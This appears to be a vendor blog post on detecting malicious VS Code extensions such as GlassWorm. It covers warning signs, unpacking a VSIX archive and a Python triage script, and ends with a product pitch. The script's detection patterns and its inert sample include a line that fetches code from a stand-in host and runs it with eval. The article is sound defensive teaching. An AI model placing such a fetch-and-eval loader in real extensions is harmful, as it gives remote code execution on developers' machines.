
Practical methods to identify, inspect, and defend against compromised IDE extensions that turn developer tools into an attack vector

GlassWorm shows how developer tools have become part of the attack surface. The same IDEs and coding assistants that boost productivity can also be used to deliver malware. Compromised extensions now run code on developer machines, steal credentials, and feed infections back into the supply chain. Here’s how to recognize and analyze them before they do damage.

Recognizing Malicious Behavior

Certain patterns appear repeatedly in malicious extensions. Dynamic code execution, such as calls to eval() on data fetched from a remote source, is an immediate warning sign. Extensions with no clear purpose that only fetch, decode, and execute code should be treated as suspect.

Some campaigns hide their communication through the Solana blockchain, using it as a covert command channel. Others rely on obfuscation with meaningless variable names like etptqzkror or vldvs, heavy Base64 encoding, and string manipulation that conceals payloads. Several create and run new files such as run.js using Node’s child_process.exec.

When these signs appear together, you are likely not dealing with sloppy programming but with malware. Even a simple theme can conceal a loader that downloads a second-stage payload.

Examining a VSIX Extension

A .vsix file is just a ZIP archive. Rename it from .vsix to .zip, extract it, and open it. Inside you’ll find folders like src or dist, and files such as extension.js or extension.ts.

Start with package.json. It lists commands, permissions, and activation events. Unexpected triggers or remote network calls indicate trouble. Next, review the JavaScript files for encoded strings, URLs, or any process execution commands.

If you prefer a faster method, use a VSIX viewer extension in VS Code. It lets you open and inspect the contents directly.
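
The manual review described above can be scripted as a first-pass static triage. This is an added example, not Knostic's code and not how Kirin works; the regexes, the size limit, the set of activation events treated as broad, and the sample archive with its extension/ layout are assumptions of the example.

```python
import io, json, re, zipfile

# Indicators the article names; the regexes and thresholds are this example's choices.
INDICATORS = {
    "dynamic-eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "process-exec": re.compile(r"child_process|\bexec(?:Sync)?\s*\("),
    "base64": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}|\batob\s*\(|['\"]base64['\"]"),
    "url": re.compile(r"https?://[^\s'\"`)]+"),
}
BROAD_ACTIVATION = {"*", "onStartupFinished"}  # events that fire with no user action
MAX_BYTES = 5_000_000  # skip oversized members instead of inflating them


def triage_vsix(data: bytes) -> dict:
    """Statically scan a .vsix (ZIP) held in memory; nothing is extracted or run."""
    report = {"activation": [], "broad_activation": False, "main": None, "hits": {}, "skipped": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        infos = [i for i in z.infolist() if not i.is_dir()]
        manifests = sorted((i.filename for i in infos if "node_modules/" not in i.filename
                            and i.filename.rsplit("/", 1)[-1] == "package.json"),
                           key=lambda n: n.count("/"))
        if manifests:  # the shallowest package.json is taken as the extension manifest
            pkg = json.loads(z.read(manifests[0]))
            report["activation"] = pkg.get("activationEvents", [])
            report["broad_activation"] = bool(BROAD_ACTIVATION & set(report["activation"]))
            report["main"] = pkg.get("main")
        for i in infos:
            if not i.filename.endswith((".js", ".cjs", ".mjs", ".ts")):
                continue
            if i.file_size > MAX_BYTES:
                report["skipped"].append(i.filename)
                continue
            text = z.read(i).decode("utf-8", errors="replace")
            found = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
            if found:  # hits are leads for manual review, not a verdict
                report["hits"][i.filename] = found
    return report


def build_sample_vsix() -> bytes:
    """Constructed, inert sample archive for the demo (not a real extension)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        manifest = {"name": "sample-theme", "main": "./dist/extension.js", "activationEvents": ["*"]}
        z.writestr("extension/package.json", json.dumps(manifest))
        z.writestr("extension/dist/extension.js", "const cp = require('child_process');\n"
                   "fetch('https://example.invalid/cfg').then(r => r.text()).then(t => eval(t));\n")
        z.writestr("extension/dist/theme.js", "module.exports = { color: '#fff' };\n")
    return buf.getvalue()
```

Pass the bytes of a downloaded .vsix to triage_vsix() to get the activation events, the entry point, and the files worth opening first; legitimate extensions also use URLs and child_process, so read the flagged files before drawing a conclusion.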

Strengthening IDE Security

Your IDE should be treated as a critical system. Only install extensions from verified publishers. Review updates, especially when a long-inactive project suddenly releases a new version. Run untrusted code in isolated environments and monitor for unusual network activity.

Kirin by Knostic detects infected extensions at installation time. It alerts the user instantly and blocks the threat before it spreads through the environment.

Developer workstations and coding assistants now hold privileged access to code, tokens, and infrastructure. Understanding how to inspect and validate extensions is basic operational security.

To see how Knostic protects enterprises, developers, and AI coding agents from attacks like GlassWorm, visit https://www.knostic.ai/ai-coding-security-solution-kirin.
